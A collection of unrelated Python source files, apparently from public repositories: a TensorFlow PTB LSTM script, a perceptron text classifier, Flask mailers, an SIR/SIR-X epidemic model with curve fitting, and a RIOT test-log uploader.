flags.DEFINE_string(
"model", "small",
"A type of model. Possible options are: small, medium, large.")
flags.DEFINE_string("data_path", None, "data_path")
FLAGS = flags.FLAGS
class PTBModel(object):
"""The PTB model."""
def __init__(self, is_training, config):
self.batch_size = batch_size = config.batch_size
self.num_steps = num_steps = config.num_steps
size = config.hidden_size
vocab_size = config.vocab_size
self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])
self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])
# Slightly better results can be obtained with forget gate biases
# initialized to 1 but the hyperparameters of the model would need to be
# different than reported in the paper.
lstm_cell = rnn_cell.BasicLSTMCell(size, forget_bias=0.0)
if is_training and config.keep_prob < 1:
lstm_cell = rnn_cell.DropoutWrapper(
lstm_cell, output_keep_prob=config.keep_prob)
cell = rnn_cell.MultiRNNCell([lstm_cell] * config.num_layers)
self._initial_state = cell.zero_state(batch_size, tf.float32)
with tf.device("/cpu:0"):
embedding = tf.get_variable("embedding", [vocab_size, size])
inputs = tf.split(
1, num_steps, tf.nn.embedding_lookup(embedding, self._input_data))
inputs = [tf.squeeze(input_, [1]) for input_ in inputs]
if is_training and config.keep_prob < 1:
inputs = [tf.nn.dropout(input_, config.keep_prob) for input_ in inputs]
# Simplified version of tensorflow.models.rnn.rnn.py's rnn().
# This builds an unrolled LSTM for tutorial purposes only.
# In general, use the rnn() or state_saving_rnn() from rnn.py.
#
# The alternative version of the code below is:
#
# from tensorflow.models.rnn import rnn
# outputs, states = rnn.rnn(cell, inputs, initial_state=self._initial_state)
outputs = []
states = []
state = self._initial_state
with tf.variable_scope("RNN"):
for time_step, input_ in enumerate(inputs):
if time_step > 0: tf.get_variable_scope().reuse_variables()
(cell_output, state) = cell(input_, state)
outputs.append(cell_output)
states.append(state)
output = tf.reshape(tf.concat(1, outputs), [-1, size])
logits = tf.nn.xw_plus_b(output,
tf.get_variable("softmax_w", [size, vocab_size]),
tf.get_variable("softmax_b", [vocab_size]))
loss = seq2seq.sequence_loss_by_example([logits],
[tf.reshape(self._targets, [-1])],
[tf.ones([batch_size * num_steps])],
vocab_size)
self._cost = cost = tf.reduce_sum(loss) / batch_size
self._final_state = states[-1]
if not is_training:
return
self._lr = tf.Variable(0.0, trainable=False)
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),
config.max_grad_norm)
optimizer = tf.train.GradientDescentOptimizer(self.lr)
self._train_op = optimizer.apply_gradients(zip(grads, tvars))
def assign_lr(self, session, lr_value):
session.run(tf.assign(self.lr, lr_value))
@property
def input_data(self):
return self._input_data
@property
def targets(self):
return self._targets
@property
def initial_state(self):
return self._initial_state
@property
def cost(self):
return self._cost
@property
def final_state(self):
return self._final_state
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op
class SmallConfig(object):
"""Small config."""
init_scale = 0.1
learning_rate = 1.0
max_grad_norm = 5
num_layers = 2
num_steps = 20
hidden_size = 200
max_epoch = 4
max_max_epoch = 13
keep_prob = 1.0
lr_decay = 0.5
batch_size = 20
vocab_size = 10000
class MediumConfig(object):
"""Medium config."""
init_scale = 0.05
learning_rate = 1.0
max_grad_norm = 5
num_layers = 2
num_steps = 35
hidden_size = 650
max_epoch = 6
max_max_epoch = 39
keep_prob = 0.5
lr_decay = 0.8
batch_size = 20
vocab_size = 10000
class LargeConfig(object):
"""Large config."""
init_scale = 0.04
learning_rate = 1.0
max_grad_norm = 10
num_layers = 2
num_steps = 35
hidden_size = 1500
max_epoch = 14
max_max_epoch = 55
keep_prob = 0.35
lr_decay = 1 / 1.15
batch_size = 20
vocab_size = 10000
def run_epoch(session, m, data, eval_op, verbose=False):
"""Runs the model on the given data."""
epoch_size = ((len(data) // m.batch_size) - 1) // m.num_steps
start_time = time.time()
costs = 0.0
iters = 0
state = m.initial_state.eval()
for step, (x, y) in enumerate(reader.ptb_iterator(data, m.batch_size,
m.num_steps)):
cost, state, _ = session.run([m.cost, m.final_state, eval_op],
{m.input_data: x,
m.targets: y,
m.initial_state: state})
costs += cost
iters += m.num_steps
if verbose and step % (epoch_size // 10) == 10:
print("%.3f perplexity: %.3f speed: %.0f wps" %
(step * 1.0 / epoch_size, np.exp(costs / iters),
iters * m.batch_size / (time.time() - start_time)))
return np.exp(costs / iters)
def get_config():
if FLAGS.model == "small":
return SmallConfig()
elif FLAGS.model == "medium":
return MediumConfig()
elif FLAGS.model == "large":
return LargeConfig()
else:
raise ValueError("Invalid model: %s", FLAGS.model)
def main(unused_args):
if not FLAGS.data_path:
raise ValueError("Must set --data_path to PTB data directory")
raw_data = reader.ptb_raw_data(FLAGS.data_path)
train_data, valid_data, test_data, _ = raw_data
config = get_config()
eval_config = get_config()
eval_config.batch_size = 1
eval_config.num_steps = 1
with tf.Graph().as_default(), tf.Session() as session:
initializer = tf.random_uniform_initializer(-config.init_scale,
config.init_scale)
with tf.variable_scope("model", reuse=None, initializer=initializer):
m = PTBModel(is_training=True, config=config)
with tf.variable_scope("model", reuse=True, initializer=initializer):
mvalid = PTBModel(is_training=False, config=config)
mtest = PTBModel(is_training=False, config=eval_config)
tf.initialize_all_variables().run()
for i in range(config.max_max_epoch):
lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)
m.assign_lr(session, config.learning_rate * lr_decay)
print("Epoch: %d Learning rate: %.3f" % (i + 1, session.run(m.lr)))
train_perplexity = run_epoch(session, m, train_data, m.train_op,
verbose=True)
print("Epoch: %d Train Perplexity: %.3f" % (i + 1, train_perplexity))
valid_perplexity = run_epoch(session, mvalid, valid_data, tf.no_op())
print("Epoch: %d Valid Perplexity: %.3f" % (i + 1, valid_perplexity))
test_perplexity = run_epoch(session, mtest, test_data, tf.no_op())
print("Test Perplexity: %.3f" % test_perplexity)
if __name__ == "__main__":
tf.app.run()
``` |
{
"source": "jia1/pyceptron",
"score": 3
} |
#### File: jia1/pyceptron/tc_train.py
```python
import math
import os
import re
import sys
from string import punctuation
from porter import PorterStemmer
from random import seed, randrange
args = sys.argv
if len(args) != 4:
sys.exit('Usage: python3 tc_train.py stopword-list train-class-list model')
print('Command line arguments accepted.')
stopword_list_file, train_class_list_file, model_file = args[1:]
k = 3
max_compromise = 0
num_both, num_train = 0, 0
train_ratio = 1
# train_ratio = 0.8
# test_ratio = 1 - train_ratio
num_folds_list = [10] # [5, 10]
alpha_list = [0.05] # [0.05, 0.1]
max_iterations_list = [500] # [500, 1000]
num_class = 0
class_list = []
class_to_text = {}
feat_prune_ratio = 0.7
text_to_count = {}
nxx_list = ['n10', 'n11']
nxx_map = {
'n00': 'n10',
'n01': 'n11'
}
nxx_to_word_to_class_to_chi = { n: {} for n in nxx_list }
class_to_word_to_chi = {}
class_to_feat_chi_tup = {}
text_to_word_list = {}
class_to_vocab_to_tfidf = {}
class_to_feat_tfidf_tup = {}
class_to_feat_set = {}
class_to_feat_list_sort_by_lex = {}
class_to_feat_to_index = {}
class_to_feat_mat = {}
class_to_weights = {}
p = PorterStemmer()
seed(4248)
print('Data structures loaded.')
def strip_and_filter_line(ln):
if all(x in ln for x in [':', '@']):
return []
tokens = map(lambda t: t.strip().strip(punctuation).lower(), ln.split(' '))
return list(filter(lambda t: t and len(t) > 2 and t.isalpha() and t not in stop_list, tokens))
def get_word_to_count(word_list):
word_to_count = {}
num_words = len(word_list)
prev_unigram = word_list[0]
for i in range(1, num_words):
curr_unigram = word_list[i]
ngrams = [curr_unigram, '{} {}'.format(prev_unigram, curr_unigram)]
for ngram in ngrams:
if ngram not in word_to_count:
word_to_count[ngram] = 1
else:
word_to_count[ngram] += 1
prev_unigram = curr_unigram
return word_to_count
def get_weaker_word_to_count(word_to_count):
fin_word_to_count = {}
for compromise in range(1, max_compromise + 1):
if fin_word_to_count:
break
fin_word_to_count = { word: count for word, count in word_to_count.items() \
if count >= k - compromise }
for len_gram in range(2, 0, -1):
fin_word_to_count = { word: count for word, count in fin_word_to_count.items() \
if len(word.split(' ')) >= len_gram }
if fin_word_to_count:
break
return fin_word_to_count
def is_in(a, b):
return 1 if a in b else 0
def count_nxx(nxx, w, c):
nxx_value = 0
if nxx == 'n10':
for class_name in filter(lambda x: x != c, class_list):
for text in class_to_text[class_name]:
nxx_value += is_in(w, text_to_count[text])
elif nxx == 'n11':
for text in class_to_text[c]:
nxx_value += is_in(w, text_to_count[text])
return nxx_value
def calc_chi_square(w, c):
nxx_to_count = {}
for n in nxx_list:
if w not in nxx_to_word_to_class_to_chi[n]:
nxx_to_word_to_class_to_chi[n][w] = {}
if c not in nxx_to_word_to_class_to_chi[n][w]:
nxx_to_word_to_class_to_chi[n][w][c] = count_nxx(n, w, c)
nxx_to_count[n] = nxx_to_word_to_class_to_chi[n][w][c]
for n, nn in nxx_map.items():
nxx_to_count[n] = num_train - nxx_to_word_to_class_to_chi[nn][w][c]
n00, n01, n10, n11 = nxx_to_count['n00'], nxx_to_count['n01'], nxx_to_count['n10'], nxx_to_count['n11']
return ((n11+n10+n01+n00)*(n11*n00-n10*n01)**2)/((n11+n01)*(n11+n10)*(n10+n00)*(n01+n00))
def put_chi(c, w, chi_value):
global class_to_word_to_chi
if w not in class_to_word_to_chi[c]:
class_to_word_to_chi[c][w] = chi_value
else:
class_to_word_to_chi[c][w] = max(class_to_word_to_chi[c][w], chi_value)
def gen_feat_by_chi():
global class_to_feat_chi_tup
max_feat_vec_len = sys.maxsize
class_to_feat_sorted = { c: [] for c in class_list }
for c in class_to_word_to_chi:
class_to_feat_sorted[c] = sorted(class_to_word_to_chi[c].items(), key = lambda x: x[1], reverse = True)
max_feat_vec_len = min(max_feat_vec_len, len(class_to_feat_sorted[c]))
max_feat_vec_len *= feat_prune_ratio
class_to_feat_chi_tup = { c: class_to_feat_sorted[c][:int(max_feat_vec_len)] for c in class_to_feat_sorted }
def gen_feat_by_tfidf():
global class_to_vocab_to_tfidf
for c in class_list:
for text in class_to_text[c]:
word_list = text_to_word_list[text]
prev_unigram = word_list[0]
class_to_vocab_to_tfidf[c][prev_unigram] = 0
for i in range(1, len(word_list)):
curr_unigram = word_list[i]
bigram = '{} {}'.format(prev_unigram, curr_unigram)
class_to_vocab_to_tfidf[c][curr_unigram] = 0
class_to_vocab_to_tfidf[c][bigram] = 0
prev_unigram = curr_unigram
for c in class_list:
for text in class_to_text[c]:
word_list = text_to_word_list[text]
prev_unigram = word_list[0]
class_to_vocab_to_tfidf[c][prev_unigram] = 0
for i in range(1, len(word_list)):
curr_unigram = word_list[i]
bigram = '{} {}'.format(prev_unigram, curr_unigram)
class_to_vocab_to_tfidf[c][curr_unigram] += 1
class_to_vocab_to_tfidf[c][bigram] += 1
prev_unigram = curr_unigram
for c in class_list:
num_texts = len(class_to_text[c])
for v in class_to_vocab_to_tfidf[c]:
class_to_vocab_to_tfidf[c][v] = math.log(num_texts / (1 + class_to_vocab_to_tfidf[c][v]))
max_feat_vec_len = sys.maxsize
class_to_feat_sorted = { c: [] for c in class_list }
for c in class_to_word_to_chi:
class_to_feat_sorted[c] = sorted(class_to_vocab_to_tfidf[c].items(), key = lambda x: x[1], reverse = True)
max_feat_vec_len = min(max_feat_vec_len, len(class_to_feat_sorted[c]))
max_feat_vec_len *= feat_prune_ratio
class_to_vocab_to_tfidf = { c: class_to_feat_sorted[c][:int(max_feat_vec_len)] for c in class_to_feat_sorted }
def feat_select():
# gen_feat_by_tfidf()
for c in class_list:
for text in class_to_text[c]:
for w in text_to_count[text]:
put_chi(c, w, calc_chi_square(w, c))
gen_feat_by_chi()
print('Helper functions defined.')
with open(stopword_list_file, 'r') as s:
stop_list = list(map(lambda ln: ln.strip(), s.readlines()))
print('Stop words loaded into memory.')
with open(train_class_list_file, 'r') as t:
lines = map(lambda ln: ln.strip().split(' '), t.readlines())
for ln in lines:
file, curr_class = ln
text = file.split('/')[-1]
num_both += 1
num_train += 1
flat_text = []
with open(file, 'r') as f:
for line in map(lambda ln: strip_and_filter_line(ln), f.readlines()):
flat_text.extend(list(map(lambda word: p.stem(word, 0, len(word) - 1), line)))
word_to_count = get_word_to_count(flat_text)
fin_word_to_count = { word: count for word, count in word_to_count.items() if count >= k }
if not fin_word_to_count:
fin_word_to_count = get_weaker_word_to_count(word_to_count)
sum_count = sum(fin_word_to_count.values())
if curr_class not in class_list:
class_list.append(curr_class)
num_class += 1
class_to_text[curr_class] = set()
class_to_word_to_chi[curr_class] = {}
class_to_feat_chi_tup[curr_class] = set()
class_to_vocab_to_tfidf[curr_class] = {}
# class_to_word_to_num_text[curr_class] = {}
class_to_feat_tfidf_tup[curr_class] = set()
class_to_feat_set[curr_class] = set()
class_to_feat_list_sort_by_lex[curr_class] = []
class_to_feat_to_index[curr_class] = {}
class_to_weights[curr_class] = []
class_to_text[curr_class].add(text)
text_to_word_list[text] = flat_text
text_to_count[text] = { word: count / sum_count for word, count in fin_word_to_count.items() }
print('Frequency of unigrams and bigrams counted.')
class_to_word_to_chi = { c: {} for c in class_list }
class_to_feat_chi_tup = { c: set() for c in class_list }
class_to_word_to_num_text = { c: {} for c in class_list }
class_to_feat_tfidf_tup = { c: set() for c in class_list }
print('Feature selection beginning...')
feat_select()
print('Feature selection completed.')
class_to_feat_set = { c: set() for c in class_list }
for c in class_to_feat_chi_tup:
for p in class_to_feat_chi_tup[c]:
w = p[0]
class_to_feat_set[c].add(w)
curr_num_feat = len(class_to_feat_set[c])
num_feat_per_neg_class = curr_num_feat // (num_class - 1)
for nc in class_to_feat_chi_tup:
if nc != c:
num_added = 0
for t in class_to_feat_chi_tup:
class_to_feat_set[c].add(t[0])
if num_added >= num_feat_per_neg_class:
break
print('Features from negative classes added to each positive class.')
class_to_feat_list_sort_by_lex = { c: sorted(list(class_to_feat_set[c])) for c in class_list }
class_to_feat_to_index = { c: {} for c in class_list }
for c in class_to_feat_list_sort_by_lex:
for i in range(len(class_to_feat_list_sort_by_lex[c])):
class_to_feat_to_index[c][class_to_feat_list_sort_by_lex[c][i]] = i
print('Features mapped to vector indices.')
# https://machinelearningmastery.com/implement-perceptron-algorithm-scratch-python/
# Split data_mat into num_folds number of folds
def get_folds(data_mat, num_folds):
folds = []
data_clone = list(data_mat)
fold_size = int(len(data_mat) / num_folds)
for i in range(num_folds):
fold = []
while len(fold) < fold_size:
index = randrange(len(data_clone))
fold.append(data_clone.pop(index))
folds.append(fold)
return folds
# Calculate accuracy percentage
def get_accuracy(predicted, actual):
num_correct = 0
for i in range(len(actual)):
if predicted[i] == actual[i]:
num_correct += 1
return num_correct / len(actual) * 100
# Evaluate an algorithm using a cross validation split
def get_cross_validation_scores(data_mat, algorithm, num_folds, *args):
folds = get_folds(data_mat, num_folds)
scores = []
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = [row for fold in train_set for row in fold]
test_set = []
for row in fold:
row_clone = list(row)
test_set.append(row_clone)
row_clone[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
accuracy = get_accuracy(predicted, actual)
scores.append(accuracy)
return scores
# Make a prediction with weights
def predict(row, weights):
activation = weights[0]
for i in range(len(row) - 1):
activation += weights[i + 1] * row[i]
return 1 if activation >= 0 else 0
# Estimate Perceptron weights using stochastic gradient descent
def train_weights(train, alpha, max_iterations = 1000):
weights = [0 for i in range(len(train[0]))]
for _ in range(max_iterations):
for row in train:
prediction = predict(row, weights)
error = row[-1] - prediction
if error:
weights[0] = weights[0] + alpha * error
for i in range(len(row) - 1):
weights[i + 1] += alpha * error * row[i]
return weights
# Perceptron Algorithm With Stochastic Gradient Descent
def perceptron(train, test, alpha, max_iterations):
predictions = list()
weights = train_weights(train, alpha, max_iterations)
for row in test:
prediction = predict(row, weights)
predictions.append(prediction)
return predictions
print('Perceptron helper functions defined.')
# Load and prepare data
class_to_feat_mat = { c: [] for c in class_list }
for c in class_list:
for d in class_list:
texts = class_to_text[d]
num_texts = len(texts)
texts = iter(texts)
if c != d:
num_texts_to_train = int(num_texts * train_ratio / (num_class - 1))
else:
num_texts_to_train = num_texts
for i in range(num_texts_to_train):
text = next(texts)
feat_vec = [0 for i in range(len(class_to_feat_to_index[d]) + 1)]
for word in text_to_count[text]:
if word in class_to_feat_to_index[d]:
index = class_to_feat_to_index[d][word]
feat_vec[index] = text_to_count[text][word]
feat_vec[-1] = 1 if c == d else 0
class_to_feat_mat[c].append(feat_vec)
print('Training data converted to vectors.')
data = class_to_feat_mat
print('Cross validation beginning...')
for num_folds in num_folds_list:
for alpha in alpha_list:
for max_iterations in max_iterations_list:
print('{}-fold cross validation'.format(num_folds))
print('Learning rate: {}, maximum number of iterations: {}'.format(alpha, max_iterations))
for c in class_list:
scores = get_cross_validation_scores(data[c], perceptron, num_folds, alpha, max_iterations)
print('Class: {}'.format(c))
print('Cross validation scores: {}'.format(scores))
print('Mean accuracy: {:.2f}%'.format(sum(scores) / num_folds))
print()
print('Cross validation completed.')
print('Full training beginning...')
print('Training beginning...')
for c in class_list:
class_to_weights[c] = train_weights(data[c], alpha_list[0], max_iterations_list[0])
print('Weights being written to model file...')
with open(model_file, 'w') as m:
lines_to_write = []
lines_to_write.append(str(class_list))
lines_to_write.append(str(class_to_feat_to_index))
lines_to_write.append(str(class_to_weights))
m.write('\n'.join(lines_to_write))
print('Done.')
# Write model to file
# 1. Class list
# 2. Class to feature to index on feature vector
# 3. Class to weights
``` |
{
"source": "jia1/redesigned-eureka",
"score": 3
} |
#### File: jia1/redesigned-eureka/soccat.py
```python
from flask_mail import Mail, Message
import configparser, jinja2, re
# ENQUIRY TYPES
# Connect
# 0 General enquiry
# 1 General feedback
# Partnership
# 2 Collaboration and partnership
# 3 Marketing and sponsorship
# 4 Student-alumni relations
# Outreach
# 5 Event publicity
# 6 Recruitment notice
# Help
# 7 Academic advisory
# 8 Locker enquiry
# 9 IT support
enquiries = {
'0': 'General enquiry',
'1': 'General feedback',
'2': 'Collaboration and partnership',
'3': 'Marketing and sponsorship',
'4': 'Student-alumni relations',
'5': 'Event publicity',
'6': 'Recruitment notice',
'7': 'Academic advisory',
'8': 'Locker enquiry',
'9': 'IT support'
}
recipients = {
'0': ['<EMAIL>'],
'1': ['<EMAIL>'],
'2': ['<EMAIL>'],
'3': ['<EMAIL>'],
'4': ['<EMAIL>'],
'5': ['<EMAIL>'],
'6': ['<EMAIL>'],
'7': ['<EMAIL>'],
'8': ['<EMAIL>'],
'9': ['<EMAIL>', '<EMAIL>']
}
required_fields = ['enquiry', 'name', 'email', 'subject', 'message']
optional_fields = ['phone']
email_regex = re.compile(r"[^@]+@[^@]+")
validators = {
'enquiry': lambda x: x and len(x) == 1 and x.isdigit(),
'name': lambda x: x and 2 <= len(x) <= 30,
'email': lambda x: x and 6 <= len(x) <= 30 and email_regex.match(x),
'phone': lambda x: not x or 8 <= len(x) <= 16 and x.isdigit(),
'subject': lambda x: x and 10 <= len(x) <= 50,
'message': lambda x: x and 10 <= len(x) <= 500
}
def emeow(app, data):
insider = configparser.ConfigParser()
insider.read('himitsu.ini')
app.config['MAIL_SERVER'] = insider['emeow'].get('server')
app.config['MAIL_PORT'] = insider['emeow'].getint('port')
app.config['MAIL_USERNAME'] = insider['emeow'].get('sender')
app.config['MAIL_PASSWORD'] = insider['emeow'].get('password')
app.config['MAIL_USE_SSL'] = insider['emeow'].getboolean('ssl')
app.config['MAIL_USE_TLS'] = insider['emeow'].getboolean('tls')
mailer = Mail(app)
validated = is_valid(data)
if validated:
enquiry_id = data['enquiry']
# flask_mail.Message(
# subject, recipients, body, html, sender, cc, bcc, reply_to,
# date, charset, extra_headers, mail_options, rcpt_options
# )
mail = Message(
subject = "Connect: %s" % data['subject'],
recipients = recipients[enquiry_id],
sender = insider['emeow'].get('sender')
)
template = jinja2.Environment(
trim_blocks = True,
lstrip_blocks = True,
autoescape = True,
loader = jinja2.FileSystemLoader('templates')
).get_template('meow.html.j2')
data['enquiry'] = enquiries[enquiry_id]
mail.html = template.render(data)
mailer.send(mail)
return 'emeow: OK'
else:
return 'is_valid returns %s: %s' % validated
def is_valid(data):
if data is None or type(data) is not dict:
return (False, "Data is either None or not a dict.")
else:
for field in required_fields:
if field not in data:
return (False, "Missing field: %s." % field)
elif not validate(field, data[field]):
return (False, "Invalid value for the field: %s." % field)
for field in optional_fields:
if field not in data:
continue
elif not validate(field, data[field]):
return (False, "Invalid value for the field: %s." % field)
return (True, "Data is valid.")
def validate(field, value):
return validators[field](value)
``` |
{
"source": "jia1/xdk-json-parser",
"score": 2
} |
#### File: jia1/xdk-json-parser/app.py
```python
import configparser, jinja2, requests
from flask import Flask, jsonify
from flask_mail import Mail, Message
app = Flask(__name__)
@app.route('/')
def index():
data = requests.get('http://172.16.17.32:8082/mongodb/boschxdk03/latestdata').json()
return jsonify({key:value for key,value in data.items() if key in ['noiselevel','temperature','humidity','millilux']})
@app.route('/alert')
def alert():
config = configparser.ConfigParser()
config.read('secret.ini')
app.config['MAIL_SERVER'] = config['email'].get('server')
app.config['MAIL_PORT'] = config['email'].getint('port')
app.config['MAIL_USERNAME'] = config['email'].get('sender')
app.config['MAIL_PASSWORD'] = config['email'].get('password')
app.config['MAIL_USE_SSL'] = config['email'].getboolean('ssl')
app.config['MAIL_USE_TLS'] = config['email'].getboolean('tls')
mailer = Mail(app)
data = {
"subject": "[Alert] Please clean up!",
"message": "Your trap is full. Please clean it up ASAP!"
}
mail = Message(
subject = data['subject'],
recipients = config['email'].get('recipients').split(','),
sender = config['email'].get('sender')
)
template = jinja2.Environment(
trim_blocks = True,
lstrip_blocks = True,
autoescape = True,
loader = jinja2.FileSystemLoader('templates')
).get_template('email.html.j2')
mail.html = template.render(data)
mailer.send(mail)
return jsonify({"SENT": "OK"})
``` |
{
"source": "jia200x/open-sir",
"score": 3
} |
#### File: jia200x/open-sir/model.py
```python
import numpy as np # Numerical computing
from scipy.integrate import odeint # ODE system numerical integrator
from scipy.optimize import curve_fit
ABSERR = 1.0e-8
RELERR = 1.0e-6
DAYS = 7
NUMPOINTS = DAYS
def call_solver(func, p, w0, t):
"""
Internal function to wrap the solver.
The integrating routine *odeint* requires for parameters that were previously defined:
* func: function to be integrated.
* y0: vector of initial conditions of the state variables.
* t: discrete time-steps where the solution is going to be evaluated.
* args = (): Extra arguments to pass to function. In our case, is the vector of parameters **p**
"""
# Call the ODE solver.
sol = odeint(func, w0, t, args=(p,), atol=ABSERR, rtol=RELERR)
return np.insert(sol, 0, t, axis=1)
# pylint: disable=W0613
def sir(w, t, p):
""" SIR: Simple model of disease spread
inputs:
w: vector of state variables [S,I,R]
where
S: Fraction of the population susceptible to the infection
I: Fraction on the population infected
R: Fraction of the population recovered
t: Current time
p: vector of parameter
returns:
f: right hand side of the system of differential equation
"""
# unpack state variable
s, i, r = w # pylint: disable=W0612
# unpack parameter
alpha, beta = p
ds_dt = -alpha * s * i
di_dt = alpha * s * i - beta * i
dr_dt = beta * i
return [ds_dt, di_dt, dr_dt]
def sirx(w, t, p):
""" SIR-X: Dynamic outbreaks with temporally increasing
intervention
inputs:
w: vector of state variables [S,I,R,X]
where
S: Fraction of the population susceptible to the infection
I: Fraction on the population infected
R: Fraction of the population that recovered
X: Fraction of the population that is quarantined
t: time
p: vector of parameter
returns:
right hand side of the system of differential equation
"""
# unpack state variable
s, i, r, x = w # pylint: disable=W0612
# unpack parameter
alpha, beta, kappa_0, kappa = p
ds_dt = -alpha * s * i - kappa_0 * s
di_dt = alpha * s * i - beta * i - kappa_0 * i - kappa * i
dr_dt = kappa_0 * s + beta * i
dx_dt = (kappa_0 + kappa) * i
return [ds_dt, di_dt, dr_dt, dx_dt]
class Model:
""" Base model definition """
CSV_ROW = []
NUM_PARAMS = 4
NUM_IC = 4
FUNC = None
def __init__(self):
self.sol = None
self.p = None
self.pop = None
self.w0 = None
self.pcov = None
def _set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model. The parameters units are 1/day.
initial_conds: Initial conditions, in total number of individuals.
For instance, S0 = n_S0/population, where n_S0 is the number of subjects
who are susceptible to the disease.
"""
num_params = self.__class__.NUM_PARAMS
num_ic = self.__class__.NUM_IC
if len(p) != num_params or len(initial_conds) != num_ic:
raise Exception(
"Invalid number of parameters \
or initial conditions"
)
self.p = p
self.pop = np.sum(initial_conds)
self.w0 = initial_conds / self.pop
return self
def export(self, f, delimiter=","):
""" Export the output of the model in CSV format
Calling this before solve() raises an exception.
input:
f: file name or descriptor
delimiter: delimiter of the CSV file
"""
if self.sol is None:
raise Exception("Missing call to solve()")
np.savetxt(f, self.sol, header=",".join(self.__class__.CSV_ROW), delimiter=",")
def fetch(self):
""" Fetch the data from the model.
The first row is the time in days
"""
return self.sol
def solve(self, tf_days=DAYS, numpoints=NUMPOINTS):
""" Solve using children class model.
input:
tf_days: number of days to simulate
numpoints: number of points for the simulation.
output:
Reference to self
"""
tspan = np.linspace(0, tf_days, numpoints)
sol = call_solver(self.__class__.FUNC, self.p, self.w0, tspan)
# Multiply by the population
sol[:, 1:] *= self.pop
self.sol = sol
return self
@property
def r0(self):
""" Returns reproduction number
r0 = alpha/beta"""
return self.p[0] / self.p[1]
def fit(self, t_obs, n_i_obs, population, fit_index=None):
""" Use the Levenberg-Marquardt algorithm to fit
the parameter alpha, as beta is assumed constant
inputs:
t_obs: Vector of days corresponding to the observations of number of infected people
n_i_obs: Vector of number of infected people
population: Size of the objective population
Return
"""
# if no par_index is provided, fit only the first parameter
if fit_index is None:
fit_index = [False for i in range(len(self.p))]
fit_index[0] = True
# Initial values of the parameters to be fitted
fit_params0 = np.array(self.p)[fit_index]
# Define fixed parameters: this set of parameters won't be fitted
# fixed_params = self.p[fix_index]
def function_handle(t, *par_fit, population=population):
params = np.array(self.p)
params[fit_index] = par_fit
self.p = params
i_mod = call_solver(self.__class__.FUNC, self.p, self.w0, t)
return i_mod[:, 2] * population
# Fit parameters
par_opt, pcov = curve_fit(
f=function_handle, xdata=t_obs, ydata=n_i_obs, p0=fit_params0
)
self.p[fit_index] = par_opt
self.pcov = pcov
return self
# return p_new, pcov
class SIR(Model):
""" SIR model definition """
CSV_ROW = ["Days", "S", "I", "R"]
NUM_PARAMS = 2
NUM_IC = 3
FUNC = sir
def set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model [alpha, beta]. All these
values should be in 1/day units.
initial_conds: Initial conditions (n_S0, n_I0, n_R0), where:
n_S0: Total number of susceptible to the infection
n_I0: Toral number of infected
n_R0: Total number of recovered
Note n_S0 + n_I0 + n_R0 = Population
Internally, the model initial conditions are the ratios
S0 = n_S0/Population
I0 = n_I0/Population
R0 = n_R0/Population
which is consistent with the mathematical description
of the SIR model.
output:
reference to self
"""
self._set_params(p, initial_conds)
return self
class SIRX(Model):
""" SIRX model definition """
CSV_ROW = ["Days", "S", "I", "R", "X"]
NUM_PARAMS = 4
NUM_IC = 4
FUNC = sirx
def set_params(self, p, initial_conds):
""" Set model parameters.
input:
p: parameters of the model [alpha, beta, kappa_0, kappa]. All these
values should be in 1/day units.
initial_conds: Initial conditions (S0, I0, R0, X0), where:
n_S0: Total number of susceptible to the infection
n_I0: Total number of infected
n_R0: Total number of recovered
n_X0: Total number of quarantined
Note: n_S0 + n_I0 + n_R0 + n_X0 = Population
Internally, the model initial conditions are the ratios
S0 = n_S0/Population
I0 = n_I0/Population
R0 = n_R0/Population
X0 = n_X0/Population
which is consistent with the mathematical description
of the SIR model.
output:
reference to self
"""
self._set_params(p, initial_conds)
return self
``` |
{
"source": "jia200x/riot_release_collector",
"score": 2
} |
#### File: jia200x/riot_release_collector/collect.py
```python
from glob import glob
import argparse
import os
import sys
import json
import requests
import configparser
CONFIG_FILE = "config.ini"
POST_URL="https://elk.inet.haw-hamburg.de/post/"
config = configparser.ConfigParser()
def get_access_token(args):
if hasattr(args, "access_token") and args.access_token:
if "GitHub" in config:
config["GitHub"]["access_token"] = args.access_token
else:
config["GitHub"] = {"access_token": args.access_token}
return args.access_token
else:
if "GitHub" in config:
return config["GitHub"].get("access_token")
else:
return None
def fetch_logs(result_directory, release_candidate):
files = glob(os.path.join(result_directory, "*/*/*/*"))
results = []
toolchain_file = open(os.path.join(result_directory, "toolchain"), 'r')
toolchain = toolchain_file.read()
toolchain_file.close()
for f in files:
res = os.path.relpath(f, result_directory).split("/")
sd = res[3].split(".", 1)
content_file = open(f, 'r')
content = content_file.read()
content_file.close()
data = dict(board=res[0],
concept=res[1],
module=res[2],
type=sd[0],
detail=sd[1],
log=content,
release_candidate=release_candidate,
toolchain=toolchain)
results.append(data)
return results
def post_results(access_token, results):
data = {"token": access_token,
"results": results}
request = requests.post(POST_URL, json.dumps(data),
headers={'Content-type': 'application/json',
'Accept': 'text/plain'})
if request.status_code == 200:
print("Successfully received logs. Thank you")
else:
print("There was an error (Wrong token?)")
sys.exit(1)
def main():
try:
config.read(CONFIG_FILE)
except FileNotFoundError:
pass
p = argparse.ArgumentParser()
p.add_argument('result_directory', nargs='?',
help='Result directory')
p.add_argument('release_candidate', nargs='?', type=int,
help='Release Candidate number')
p.add_argument("-t", "--access-token",
help="Github access token (create one at " +
"https://github.com/settings/tokens with access " +
"(repo, admin:gpg_key) if required)")
args = p.parse_args()
result_directory = args.result_directory
if not result_directory:
print("No result directory given\n")
p.print_help()
sys.exit(1)
release_candidate = args.release_candidate
if not release_candidate:
print("No Release Candidate given\n")
p.print_help()
sys.exit(1)
access_token = get_access_token(args)
if not access_token:
print("No access token found\n")
p.print_help()
sys.exit(1)
with open(CONFIG_FILE, "w") as configfile:
config.write(configfile)
results = fetch_logs(result_directory, release_candidate)
post_results(access_token, results)
if __name__ == "__main__":
main()
``` |
{
"source": "jia3857/Makefile.test",
"score": 3
} |
#### File: Makefile.test/test/TestVariousMakeInvocation.py
```python
import os
import logging
import unittest
import shutil
import subprocess
import tempfile
import sys
import textwrap
import string
import errno
